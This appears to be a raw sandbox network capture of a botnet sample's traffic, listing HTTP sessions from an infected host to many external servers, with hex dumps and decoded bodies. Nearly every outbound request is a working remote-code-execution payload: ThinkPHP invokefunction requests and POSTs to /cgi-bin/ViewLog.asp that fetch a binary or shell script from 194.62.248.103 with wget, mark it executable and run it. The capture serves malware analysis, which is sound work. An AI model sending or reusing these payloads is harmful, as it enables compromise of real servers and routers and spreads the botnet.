                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24192.168.2.233377495.216.232.25180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.711070061 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:34:57.035600901 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:34:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25192.168.2.233921295.101.114.4280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.720478058 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:34:57.053128958 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:34:56 GMT
                                                        Date: Sun, 14 Apr 2024 14:34:56 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 36 37 32 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 32 39 36 26 23 34 36 3b 33 31 62 65 61 32 30 33 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 32 36 37 32 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 32 39 36 26 23 34 36 3b 33 31 62 65 61 32 30 33 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2672655f&#46;1713105296&#46;31bea203<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;2672655f&#46;1713105296&#46;31bea203</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26192.168.2.235591895.57.209.23680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.792642117 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:34:57.198244095 CEST29INHTTP/1.1 200 OK
                                                        Apr 14, 2024 16:34:57.198268890 CEST515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27192.168.2.234654095.100.31.19580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.832499027 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:34:57.276990891 CEST579INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 357
                                                        Expires: Sun, 14 Apr 2024 14:34:57 GMT
                                                        Date: Sun, 14 Apr 2024 14:34:57 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 66 62 31 33 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 32 39 37 26 23 34 36 3b 35 35 35 63 62 63 38 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 63 66 62 31 33 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 32 39 37 26 23 34 36 3b 35 35 35 63 62 63 38 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;cfb1302&#46;1713105297&#46;555cbc8<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;cfb1302&#46;1713105297&#46;555cbc8</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28192.168.2.233465895.38.102.368080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.877135038 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29192.168.2.2349606112.181.148.6580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.979967117 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:34:57.279002905 CEST35INHTTP/1.0 301 Redirect
                                                        Apr 14, 2024 16:34:57.279021025 CEST377INData Raw: 44 61 74 65 3a 20 53 75 6e 20 41 70 72 20 31 34 20 32 33 3a 33 34 3a 35 38 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74
                                                        Data Ascii: Date: Sun Apr 14 23:34:58 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:8899/login.asp<html><head></head><body>This document has moved to a new <a href="http://


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30192.168.2.2349420112.124.186.16180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:57.000412941 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:34:57.293335915 CEST502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:35:08 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31192.168.2.233417662.141.81.108080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:57.249289036 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:34:57.628341913 CEST490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:34:56 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32192.168.2.234452695.217.161.6580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:03.644546032 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:03.967360973 CEST494INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:03 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Content-Length: 300
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 35 6b 35 67 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 5k5g.top Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33192.168.2.235941295.0.196.21280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:03.657072067 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:05.380861998 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:07.460736036 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:11.556020021 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:19.746891022 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:37.920465946 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:10.687762022 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34192.168.2.235279494.131.60.198080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:03.894061089 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:04.113064051 CEST1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/6.0.0-20220501-re899e0c27
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:35:04 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3572
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        Cache-Status: ezproxies.com
                                                        Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
